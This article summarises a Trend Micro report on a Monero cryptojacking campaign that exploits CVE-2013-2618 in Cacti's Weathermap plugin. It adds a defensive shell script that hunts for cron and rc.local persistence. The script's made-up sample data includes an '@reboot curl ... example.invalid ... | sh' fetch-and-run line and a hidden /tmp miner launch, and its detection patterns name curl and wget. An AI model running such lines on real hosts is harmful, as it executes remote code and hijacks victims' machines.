Cryptojacking, in which attackers exploit vulnerabilities to install code that silently uses a victim's computing resources to mine cryptocurrency, has become a widespread phenomenon affecting everyday consumers and major businesses alike. A new report from cyber-security firm Trend Micro documents one of the larger campaigns seen so far: just under $75,000 worth of Monero was mined on compromised machines around the globe.
The vulnerability abused is in the Network Weathermap plugin for Cacti, which is, ironically, an open-source network monitoring tool. It was used to infect Linux servers with malware that lets the attackers burn the servers' CPU time mining Monero. Monero is the usual choice in cryptojacking schemes: its proof-of-work is designed to be mined on ordinary CPUs, so commandeered servers are profitable, and its privacy-centric design helps keep the hijackers anonymous.
This specific campaign uses a malicious shell script dubbed "watchd0g.sh" and focuses on x86-64 Linux servers in the United States, Japan, Taiwan, China, India, and much of the rest of the world.
The vulnerability, CVE-2013-2618, is a cross-site scripting flaw in the plugin's editor.php (fixed in Network Weathermap 0.97b), and a patch has been available for nearly five years. The attackers leverage it to execute code on the server hosting the plugin and install a customised build of XMRig, an open-source Monero miner. They modified XMRig's source so that it caps its own CPU usage, avoiding the load spikes that would otherwise raise red flags, and so it keeps flying under the radar. The accompanying script then establishes persistence: the miner is relaunched every time the machine boots, a cron job re-runs the script every three minutes, and the script re-downloads the miner if it has been deleted. The practical consequence is that load-based monitoring will not catch this; hunting has to look at persistence artefacts and at what is running from scratch directories.
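The following hunting script is an added example written for this page; it is not code from Trend Micro's report and does not know any real indicator from the campaign. It looks for the persistence pattern described above: a cron entry that fires every few minutes (or at `@reboot`) and fetches from the network or runs out of a scratch directory, plus an `/etc/rc.local` line that backgrounds such a program. The crontab and rc.local snippets embedded in it are constructed sample data (the `/tmp/.x/` path and `example.invalid` host are made up), and the assumption that boot persistence lives in `rc.local` or an `@reboot` cron line is mine, since the article does not say which mechanism the script uses.

```shell
#!/bin/sh
# Added example, not code from the Trend Micro report: a small hunting script
# for the persistence pattern the article describes (a cron job firing every
# few minutes that re-fetches a dropper, plus a boot-time relaunch). Paths,
# file names and sample lines below are constructed for illustration; the
# script does not know any real campaign indicator.

# Flag cron entries that fire at a short step interval (*/1 .. */5 minutes)
# or at @reboot, AND fetch from the network or run out of a scratch directory.
# Works for user crontabs (5 time fields + command) and /etc/cron.d files
# (5 time fields + user + command). Reads stdin, prints flagged lines.
flag_cron_lines() {
    grep -E '^(\*/[1-5][[:space:]]+(\*[[:space:]]+){4}|@reboot[[:space:]])' |
        grep -E '(curl|wget|/tmp/|/var/tmp/|/dev/shm/)' || true
}

# Flag non-comment lines in /etc/rc.local that background something fetched
# from the network or living in a scratch directory. Reads stdin.
flag_rc_local_lines() {
    grep -Ev '^[[:space:]]*(#|$)' |
        grep -E '(curl|wget|nohup|/tmp/|/var/tmp/|/dev/shm/)' || true
}

# Count flagged lines without the leading spaces some wc implementations emit.
count_flagged() { wc -l | tr -d ' '; }

# Constructed sample data (NOT real campaign artefacts) so the checks run offline.
sample_cron() {
cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/3 * * * * /bin/sh /tmp/.x/watchd0g.sh >/dev/null 2>&1
*/30 * * * * /usr/local/bin/backup.sh
@reboot curl -fsSL http://example.invalid/w.sh | sh
EOF
}

sample_rc_local() {
cat <<'EOF'
#!/bin/sh -e
# rc.local - executed at the end of each multiuser runlevel
/usr/local/bin/legit-daemon --start
nohup /tmp/.x/miner >/dev/null 2>&1 &
exit 0
EOF
}

# Scan the live host. Load average is not a useful signal here because the
# miner throttles itself; look at persistence and at processes that run from
# scratch directories instead.
hunt_host() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -r "$f" ] || continue
        flag_cron_lines < "$f" | sed "s|^|$f: |"
    done
    [ -r /etc/rc.local ] && flag_rc_local_lines < /etc/rc.local | sed 's|^|/etc/rc.local: |'
    if command -v ps >/dev/null 2>&1; then
        ps -eo pid,user,args 2>/dev/null | grep -E '(/tmp/|/var/tmp/|/dev/shm/)' | grep -v grep
    fi
    return 0
}

echo "== constructed sample crontab =="
sample_cron | flag_cron_lines
echo "== constructed sample rc.local =="
sample_rc_local | flag_rc_local_lines
echo "== live host =="
hunt_host
```

On the constructed samples the cron check flags the `*/3` watchd0g.sh line and the `@reboot` fetch-and-pipe-to-shell line while leaving the nightly `apt-get` and the `*/30` backup alone, and the rc.local check flags only the `nohup /tmp/.x/miner` line. The thresholds (five-minute step, the scratch directories listed) are deliberately broad; tune them to the host, and treat anything flagged as a lead to investigate rather than a verdict.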
Trend Micro tied the mining software to two Monero wallets holding just under $75,000 worth of the privacy-focused cryptocurrency. The firm also believes the campaign is connected to an earlier cryptojacking campaign against Windows machines that netted more than $3 million in XMR.
Trend Micro's advice is to keep machines up to date with all patches and that "data from Cacti should be properly kept internal to the environment", that is, the monitoring web interface should not be reachable from the internet. Because the fix is nearly five years old, many administrators will assume they are covered, yet any installation that never received it remains exposed. For more technical details on the vulnerability, Trend Micro has a full breakdown on their blog.